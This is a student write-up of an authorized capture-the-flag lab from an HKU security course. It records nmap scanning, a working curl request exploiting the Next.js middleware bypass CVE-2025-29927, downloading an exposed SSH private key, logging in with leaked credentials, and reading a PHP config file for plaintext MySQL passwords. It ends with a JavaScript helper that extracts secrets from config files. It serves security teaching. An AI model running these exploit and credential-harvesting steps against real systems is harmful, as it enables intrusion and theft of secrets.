This lab report records an authorized CTF penetration-testing exercise from the University of Hong Kong course Information Security: Attack & Defense (COMP7904). The lab environment was a dedicated test environment provided by the course; all testing was carried out with legal authorization.
Legal Disclaimer
This document details a penetration testing assignment conducted as part of the COMP7904 course at The University of Hong Kong. By reading this document, you acknowledge and agree to the following:
1. This document is for educational and research purposes ONLY.
2. All testing activities described were performed in controlled lab environments with explicit permission.
3. The techniques and tools discussed should only be used on systems you own or have explicit written permission to test.
4. The author(s) and The University of Hong Kong assume NO responsibility for any misuse of the information contained herein.
5. Unauthorized penetration testing and hacking activities are illegal and may result in criminal prosecution.
No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner, including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any broadcast for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior written permission from The University of Hong Kong.
All lecture notes, materials and discussion below concerning hacking techniques, virus attacks, denial of service or any other means of attacking computer systems are provided for educational purposes only. They must not be used to attack or damage any computer system, and nothing here encourages anyone to engage in such activity.
All technical discussion in this document is for study and research only. The author accepts no responsibility for anyone who uses this information for unlawful purposes. By reading this document you agree not to use any technique discussed or disclosed here to carry out cyberattacks or other illegal acts.
This document serves academic research and technical exchange and refuses to provide guidance for any malicious activity. Anyone who uses it unlawfully bears full legal responsibility.
Information Gathering [Flag 1]
Nmap scan: nmap -sV -sC -p- -T4 192.168.232.137
Findings:
- Open ports and services:
  - 22/tcp: OpenSSH 9.6p1 (Ubuntu Linux)
  - 80/tcp: nginx 1.24.0 (Ubuntu)
- System information:
  - Operating system: Ubuntu Linux
Next, run nmap's HTTP vulnerability scripts against the web service:
nmap -p80 -sV --script=http-vuln* 192.168.232.137
One script reports a finding (shown below). Note that CVE-2011-3192 is the Apache httpd byterange-filter DoS ("Apache Killer"); the target runs nginx, so this NSE result is a false positive and was not pursued further.
22/tcp open ssh
80/tcp open http
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011-3192 BID:49303
Visiting http://192.168.232.137 shows only the default page. The sites are served as name-based virtual hosts, so add hosts entries that point the expected names at the target:
sudo sh -c "echo '192.168.232.137 next.comp7904.com' >> /etc/hosts && echo '192.168.232.137 car.comp7904.com' >> /etc/hosts" && echo "success"
Both virtual hosts are now reachable:
http://next.comp7904.com/
http://car.comp7904.com/
Following the hint on the Next.js site, try the middleware authorization bypass (CVE-2025-29927): a request that carries the internal x-middleware-subrequest header is treated by the framework as a subrequest coming from the middleware itself, so the middleware is skipped and the protected /dashboard route is served without logging in.
curl -i \
-H "Host: next.comp7904.com" \
-H "x-middleware-subrequest: middleware" \
http://192.168.232.137/dashboard
Output:
HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Sun, 18 May 2025 07:08:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2353
Connection: keep-alive
X-Powered-By: Next.js
ETag: "931-WhM2wCBiD8TF2QUyGDVnSd3+UwY"
Vary: Accept-Encoding
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><meta name="next-head-count" content="2"/><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="stylesheet" href="/styles/globals.css"/><link rel="preload" href="/_next/static/css/e70d9ca2061e2d02.css" as="style"/><link rel="stylesheet" href="/_next/static/css/e70d9ca2061e2d02.css" data-n-g=""/><link rel="preload" href="/_next/static/css/7f7c837909d6c39e.css" as="style"/><link rel="stylesheet" href="/_next/static/css/7f7c837909d6c39e.css" data-n-p=""/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="/_next/static/chunks/polyfills-0d1b80a048d4787e.js"></script><script src="/_next/static/chunks/webpack-9b312e20a4e32339.js" defer=""></script><script src="/_next/static/chunks/framework-5f4595e5518b5600.js" defer=""></script><script src="/_next/static/chunks/main-56cc4cbb23433b0c.js" defer=""></script><script src="/_next/static/chunks/pages/_app-e09ea9323a8477f0.js" defer=""></script><script src="/_next/static/chunks/pages/dashboard-a26d09db876cfbc2.js" defer=""></script><script src="/_next/static/WAaLLrEv9ERvu7F9BX_BB/_buildManifest.js" defer=""></script><script src="/_next/static/WAaLLrEv9ERvu7F9BX_BB/_ssgManifest.js" defer=""></script></head><body><div id="__next" data-reactroot=""><div><nav><ul><li><a href="/">Home</a></li><li><a href="/login">Login</a></li></ul></nav><main><div class="Dashboard_container__dJEhR"><h1>Dashboard</h1><div class="Dashboard_card__tAwsi"><h2>Protected Content</h2><p>This is a protected page secured by middleware. 
Only authenticated users can see this.</p><div class="Dashboard_secretInfo__Oa72b"><h3>Secret Information</h3><p>SSH Passphrase: <b>dynETz</b></p><p>Test Web Application: <b><a href="http://car.comp7904.com/admin/">Car Rental Admin Portal</a></b> </p><p>Your user name and initial password: <b id="c">admin/Ab34cD7890</b></p><p id="flag">FLAG_{cv3-2025-29927}</p></div></div><div class="Dashboard_userInfo__6ooE9"><h2>User Information</h2></div></div></main></div></div><script id="__NEXT_DATA__" type="application/json">{"props":{"pageProps":{}},"page":"/dashboard","query":{},"buildId":"WAaLLrEv9ERvu7F9BX_BB","nextExport":true,"autoExport":true,"isFallback":false,"scriptLoader":[]}</script></body></html>
- Found username/password: admin/Ab34cD7890
- Found SSH passphrase: dynETz
- Found Flag 1: FLAG_{cv3-2025-29927}
Using this password, log in to http://car.comp7904.com/admin/: success!
SSH Login [Flag 2 & Flag 3]
Use gobuster to brute-force paths on the Next.js host; it turns up an SSH private key exposed under the web root:
gobuster dir -u http://next.comp7904.com -w /usr/share/wordlists/dirb/common.txt -q
Output:
/cgi-bin/ (Status: 308) [Size: 8] [--> /cgi-bin]
/dashboard (Status: 307) [Size: 52] [--> http://next.comp7904.com/login?callbackUrl=%2Fdashboard]
/id_rsa (Status: 200) [Size: 3434]
/login (Status: 200) [Size: 1780]
/profile (Status: 307) [Size: 50] [--> http://next.comp7904.com/login?callbackUrl=%2Fprofile]
Download the private key and set the restrictive permissions ssh requires:
curl -s http://next.comp7904.com/id_rsa > id_rsa
chmod 600 id_rsa
The site's contact line, "For support mail us: alice@comp7904.com", suggests the username alice.
SSH in with ssh -i id_rsa alice@192.168.232.137, entering the SSH passphrase (dynETz) recovered from the dashboard if prompted: login succeeds!
The second flag is in the home directory:
cat user.txt
- Found Flag 2: FLAG_{user-alice-home}
While browsing the folder that holds the vehicle images, the third flag turns up:
ls -la /var/www/carrental/admin/img/vehicleimages/
- Found Flag 3: FLAG_{www-data_SHELL}
Database Security Weakness
First use find to locate PHP files under /var/www whose name contains "config":
find /var/www -type f -name "*.php" | grep -i "config"
Then read the configuration file:
cat /var/www/carrental/includes/config.php
The configuration file holds the database credentials in plaintext, readable by the low-privileged alice account:
- Username: carrental
- Password: dynETz
- Database: carrental
Note the password reuse: dynETz is also the SSH passphrase shown on the Next.js dashboard, so one leaked secret unlocks two systems.
Use the recovered credentials to connect, list all databases, and list the tables in carrental (passing the password on the command line is acceptable in a lab but leaves it in shell history and process listings):
mysql -u carrental -p'dynETz' -e "SHOW DATABASES;"
mysql -u carrental -p'dynETz' -e "USE carrental; SHOW TABLES;"
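The following is an added example, not code from the report: it pulls credential-looking settings out of PHP config text and flags any value that was already recovered elsewhere, which is the reuse seen between config.php and the dashboard's SSH passphrase. The config text inside the block is a constructed stand-in modelled on what the report lists (the page does not show the real file contents), and the extra smtp_password setting in it is invented for illustration.

```javascript
'use strict';
// Added example: extract secrets from PHP config text and check them against secrets
// already recovered. SAMPLE_CONFIG is constructed for this example, not the real config.php.

const SAMPLE_CONFIG = `<?php
define('DB_SERVER', 'localhost');
define('DB_USER', 'carrental');
define('DB_PASS', 'dynETz');
define('DB_NAME', 'carrental');
$smtp_password = "dynETz";   // invented setting, to show the $var = '...' form
$con = mysqli_connect(DB_SERVER, DB_USER, DB_PASS, DB_NAME);
`;

// Setting names that usually hold a secret worth flagging.
const SENSITIVE = /pass|pwd|secret|token|key/i;

// Parse define('NAME', 'value') and $name = 'value'; with either quote style.
// Only string literals are captured; a call such as mysqli_connect(...) is skipped.
function extractSettings(phpText) {
  const settings = {};
  const defineRe = /define\(\s*['"]([A-Za-z_]\w*)['"]\s*,\s*['"]([^'"]*)['"]\s*\)/g;
  const assignRe = /\$([A-Za-z_]\w*)\s*=\s*['"]([^'"]*)['"]\s*;/g;
  for (const re of [defineRe, assignRe]) {
    let m;
    while ((m = re.exec(phpText)) !== null) settings[m[1]] = m[2];
  }
  return settings;
}

// List the sensitive settings and mark those whose value equals a secret already
// recovered (here the SSH passphrase from the Next.js dashboard).
function triage(settings, knownSecrets) {
  const known = new Set(knownSecrets);
  return Object.entries(settings)
    .filter(([name]) => SENSITIVE.test(name))
    .map(([name, value]) => ({ name, value, reused: known.has(value) }));
}

console.log(triage(extractSettings(SAMPLE_CONFIG), ['dynETz']));
```

On a real engagement the same two functions run over every file returned by the find command above; any setting marked reused is a credential to test against every other service on the host, which is exactly how the SSH passphrase and the MySQL password converged here.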